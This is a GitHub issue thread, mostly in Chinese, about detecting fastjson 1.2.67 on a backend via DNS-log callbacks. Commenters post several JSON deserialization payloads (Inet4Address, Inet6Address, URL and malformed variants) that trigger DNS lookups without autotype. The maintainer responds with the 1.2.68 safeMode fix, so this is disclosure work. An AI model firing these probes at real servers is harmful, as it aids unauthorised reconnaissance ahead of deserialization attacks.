### ISSUE TITLE
发现最新版本1.2.67依然可以通过dnslog判断后端是否使用fastjson

### ISSUE THREAD

**Issue by c0ny1** [alibaba/fastjson#3077]
`java.net.InetAddress`虽然被禁止了，但是依然可以使用如下两个payload探测后端是否是fastjson

```
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
```

**Comment by c0ny1** [comment]
而且无需开启autotype

**Comment by k3mlol** [comment]
> `java.net.InetAddress`虽然被禁止了，但是依然可以使用如下两个payload探测后端是否是fastjson
> 
> ```
> {"@type":"java.net.Inet4Address","val":"dnslog"}
> {"@type":"java.net.Inet6Address","val":"dnslog"}
> ```

nice work, thx!

**Comment by retanoj** [comment]
我再发一个畸形的
```
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
```

**Comment by c0ny1** [comment]
@retanoj nb，下午也刚好和其他师傅聊到这个payload

**Comment by qixiaobo** [comment]
新知识get

**Comment by retanoj** [comment]
还有很早的那个ysoserial里的由HashMap触发的URLDNS也能用，只不过也有点畸形
```
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
```

然而都没啥卵用啊，只能发个dns

**Comment by fnmsd** [comment]
学习了

**Comment by threedr3am** [comment]
不造你为啥要变那么畸形
```
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
```

**Comment by k3mlol** [comment]
看样子，最新的bypass也快出来了:)

**Comment by retanoj** [comment]
@threedr3am 
赞，再短点
```
Set[{"@type":"java.net.URL","val":"dnslog"}]
```
再短
```
Set[{"@type":"java.net.URL","val":"dnslog"}
```
再
```
{{"@type":"java.net.URL","val":"dnslog"}:0
```

**Comment by T4di5** [comment]
amazing ：-）

**Comment by Wfzsec** [comment]
tql

**Comment by p1gz** [comment]
只是可以判断，并不能反序列化吧，但是不需要开启autotype这个挺好的

**Comment by 0ks3iio** [comment]
能获取到啥敏感信息吗

**Comment by wenshao** [comment]
https://github.com/alibaba/fastjson/releases/tag/1.2.68
1.2.68版本提供了safeMode配置，可以完全禁用autoType，包括白名单和黑名单。

**Comment by rainbow456** [comment]
@retanoj 师傅，以上畸形的payload只能探测到存在fastjson是么？实际利用有什么思路么？

**Comment by retanoj** [comment]
> @retanoj 师傅，以上畸形的payload只能探测到存在fastjson是么？实际利用有什么思路么？

java.net.Inet4Address 这个payload只能发dns，没有利用方法了吧
